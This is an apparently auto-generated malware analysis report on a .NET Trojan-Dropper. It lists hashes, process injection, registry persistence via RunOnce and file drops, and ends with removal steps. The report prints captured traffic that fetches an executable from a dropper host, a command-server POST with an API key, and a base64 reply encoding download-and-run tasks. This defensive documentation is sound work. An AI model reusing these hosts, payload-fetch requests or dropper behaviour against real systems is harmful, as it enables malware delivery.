Gen.Variant.Barys.51615_9df56d9a61
HEUR:Trojan-Dropper.MSIL.Generic (Kaspersky), Gen:Variant.Barys.51615 (B) (Emsisoft), Gen:Variant.Barys.51615 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 9df56d9a611e40ca1e0651661154a485
SHA1: 53fe1545a339ef737a881228fbc5685784f2a809
SHA256: 7d48e9cb8969bdf371004122d8b2c74f2785b6d52a009d1d4cf1fc0dde76c027
SSDeep: 3072:1T0ybbLTMpQtuKKyQT2HK4rO1HdoRNZsayWcpelNxvrhdODvIACMJ9VGseQw8 8A: IbLT91KyQhgNZcpG7vrhdOzHFeQRZo
Size: 257536 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-09-10 18:17:08
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
Sho9libi.exe:3104
%original file name%.exe:2180
The Trojan injects its code into the following process(es):
%original file name%.exe:3436
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Sho9libi.exe:3104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
The process %original file name%.exe:3436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\Sho9libi.exe (254033 bytes)
C:\config.conf (47 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\SecondL.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\OneTwo.exe (0 bytes)
Registry activity
The process Sho9libi.exe:3104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
The process %original file name%.exe:2180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\9df56d9a611e40ca1e0651661154a485_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\9df56d9a611e40ca1e0651661154a485_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9df56d9a611e40ca1e0651661154a485_RASMANCS]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9df56d9a611e40ca1e0651661154a485_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\9df56d9a611e40ca1e0651661154a485_RASMANCS]
"MaxFileSize" = "1048576"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_7FAYT" = "C:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
Dropped PE files
| MD5 | File path |
|---|---|
| 1d337d070da8da9771efd57b671a601d | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\Sho9libi.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: GY%U6T
Product Name: GY%U6TDT
Product Version: 1.3.6.0
Legal Copyright: Copyright (c) 6196
Legal Trademarks:
Original Filename: OAs.exe
Internal Name: OAs.exe
File Version: 1.3.6.0
File Description: GY
Comments: GY%U6T
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 46628 | 47104 | 4.28311 | d9408f441dd5962cc5d44c4e81a726fb |
| .rsrc | 57344 | 209104 | 209408 | 4.26442 | f630a9f4f14d2fceaaca322b69c785e8 |
| .reloc | 270336 | 12 | 512 | 0.056519 | f7c0749e1f78e3e4db3d10988238f9c6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://thegrandemanager.com/remotes_xml_sections.php | |
| hxxp://lamarinadedownload.com/exe/updater.exe | |
| agent.wizztrakys.com | |
| dns.msftncsi.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /exe/updater.exe HTTP/1.1
Host: lamarinadedownload.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 18 Sep 2017 13:21:25 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
24c800..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L......Y.........."...0...!.........J)!.. ...@!...@.. ................
....... %...........@..................................(!.O....@!.....
..................%......'!...........................................
... ............... ..H............text...P.!.. ....!.................
..`.rsrc........@!.......!.............@..@.reloc........%.......$...
..........@..B................,)!.....H.......L"..T............1.. . .
........................................6.(.....(....*...0..........(.
...(.....~....(.....~....(.....(......o........io.....(.....o....(....
(........o....r...po.......o....t%..........%...o....&..&..*..........
.......0..3.......(....~....o......s ...%o!.....o"...o#.......&.....*.
........,,.......0..........s$......&.....*.................z.,..{....
,..{....o%.....(&...*z.s'...}......((....r...po)...*..(....*~r#..p....
.re..p.....r...p.....*..(*...*.~....-.r...p.....( ...o,...s-........~.
...*.~....*.......*.~....*..(....*Vs....(/...t.........*..BSJB........
....v2.0.50727......l.......#~......l...#Strings............#US.......
..#GUID.......`...#Blob...........W..........3......../...............
..../...................................................[.............
....w...........>.................{.......................M........
...........b...Q.....(...........n.................[.....r.....2......
.=...=.......b.....b.......................................I.....2<<< skipped >>>
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: thegrandemanager.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Mon, 18 Sep 2017 13:20:51 GMT
Server: Apache
Set-Cookie: PHPSESSID=nmj80314lcqih6qc0un93st7g3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1636
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vbGFtYXJpbmFkZWRvd25sb2Fk
LmNvbS9mcm9tX2JhY2t1cC83NDc0NzQvQWRzU2hvd19pbnN0YWxsZXIuZXhlIiB2ZXJzaW
9uPSIiICBzb2Z0d2FyZT0iIiBuZXQ9InllcyIgLz4NCjxwcm9jZXNzIHR5cGU9InN0YXJ0
IiBuYW1lPSJTZWNvbmRMIiB2YWx1ZT0ibm90d2FpdCIgcGFyYW1zPSJuaW1wb3J0ZSIvPg
0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IlFzT25lIiB2YWx1ZT0iMTcwOTE4Ii8 DQoNCjwv
cGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9Il
FzT25lIiB2YWx1ZT0iNDUxNzA5MTgiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2NvbmRpdGlv
bnM DQo8L3Rhc2s PHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbmFtZT0iT2
5lVHdvIiB2YWx1ZT0iaHR0cDovL2xhbWFyaW5hZGVkb3dubG9hZC5jb20vMy8wMDAwMDAv
d2l6emNhc3Rlcl9pbnN0YWxsZXJfdjIuZXhlIiB2ZXJzaW9uPSIiICBzb2Z0d2FyZT0iIi
BuZXQ9InllcyIgLz4NCjxwcm9jZXNzIHR5cGU9InN0YXJ0IiBuYW1lPSJPbmVUd28iIHZh
bHVlPSJub3R3YWl0IiBwYXJhbXM9IjU3YTc2NGQwNDJiZjgiLz4NCjxtb2QgdHlwZT0iYW
RkIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMDAwMTcwOTE4Ii8 DQoNCjwvcGVyZm9ybT4NCg0K
PGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkhhaGEiIHZhbHVlPS
IxNzA5MTgiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2NvbmRpdGlvbnM DQo8L3Rhc2s PHRh
c2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbmFtZT0iU2hvOWxpYmkiIHZhbHVlPS
JodHRwOi8vbGFtYXJpbmFkZWRvd25sb2FkLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNp
b249IiIgIHNvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3Rhcn
QiIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0
eXBlPSJhZGQiIG5hbWU9IkRhdGUiIHZhbHVlPSJmZThmMTcwOTE4Ii8 DQoNCjwvcGVyZm
9ybT4NCg0KPGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRh<<< skipped >>>
The Trojan connects to the servers at the following location(s):
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Sho9libi.exe:3104
%original file name%.exe:2180
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TU79TL9N1V\Sho9libi.exe.config (1 bytes)
C:\config.conf (47 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_7FAYT" = "C:\%original file name%.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.